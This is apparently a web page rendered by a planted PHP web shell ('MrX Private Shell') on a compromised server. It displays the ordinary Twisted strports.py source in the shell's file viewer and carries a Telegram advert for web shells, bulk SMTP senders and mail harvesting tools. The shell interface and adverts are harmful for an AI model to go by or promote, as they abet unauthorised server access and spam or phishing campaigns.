__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
# -*- test-case-name: twisted.test.test_strports -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.

"""
Construct listening port services from a simple string description.

@see: L{twisted.internet.endpoints.serverFromString}
@see: L{twisted.internet.endpoints.clientFromString}
"""
from typing import Optional, cast

from twisted.application.internet import StreamServerEndpointService
from twisted.internet import endpoints, interfaces


def _getReactor() -> interfaces.IReactorCore:
    from twisted.internet import reactor

    return cast(interfaces.IReactorCore, reactor)


def service(
    description: str,
    factory: interfaces.IProtocolFactory,
    reactor: Optional[interfaces.IReactorCore] = None,
) -> StreamServerEndpointService:
    """
    Return the service corresponding to a description.

    @param description: The description of the listening port, in the syntax
        described by L{twisted.internet.endpoints.serverFromString}.
    @type description: C{str}

    @param factory: The protocol factory which will build protocols for
        connections to this service.
    @type factory: L{twisted.internet.interfaces.IProtocolFactory}

    @rtype: C{twisted.application.service.IService}
    @return: the service corresponding to a description of a reliable stream
        server.

    @see: L{twisted.internet.endpoints.serverFromString}
    """
    if reactor is None:
        reactor = _getReactor()

    svc = StreamServerEndpointService(
        endpoints.serverFromString(reactor, description), factory
    )
    svc._raiseSynchronously = True
    return svc


def listen(
    description: str, factory: interfaces.IProtocolFactory
) -> interfaces.IListeningPort:
    """
    Listen on a port corresponding to a description.

    @param description: The description of the connecting port, in the syntax
        described by L{twisted.internet.endpoints.serverFromString}.
    @type description: L{str}

    @param factory: The protocol factory which will build protocols on
        connection.
    @type factory: L{twisted.internet.interfaces.IProtocolFactory}

    @rtype: L{twisted.internet.interfaces.IListeningPort}
    @return: the port corresponding to a description of a reliable virtual
        circuit server.

    @see: L{twisted.internet.endpoints.serverFromString}
    """
    from twisted.internet import reactor

    name, args, kw = endpoints._parseServer(description, factory)
    return cast(
        interfaces.IListeningPort, getattr(reactor, "listen" + name)(*args, **kw)
    )


__all__ = ["service", "listen"]

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
newsfragments Folder 0755
runner Folder 0755
test Folder 0755
twist Folder 0755
__init__.py File 129 B 0644
app.py File 22.61 KB 0644
internet.py File 36.26 KB 0644
reactors.py File 2.28 KB 0644
service.py File 11.47 KB 0644
strports.py File 2.53 KB 0644
Filemanager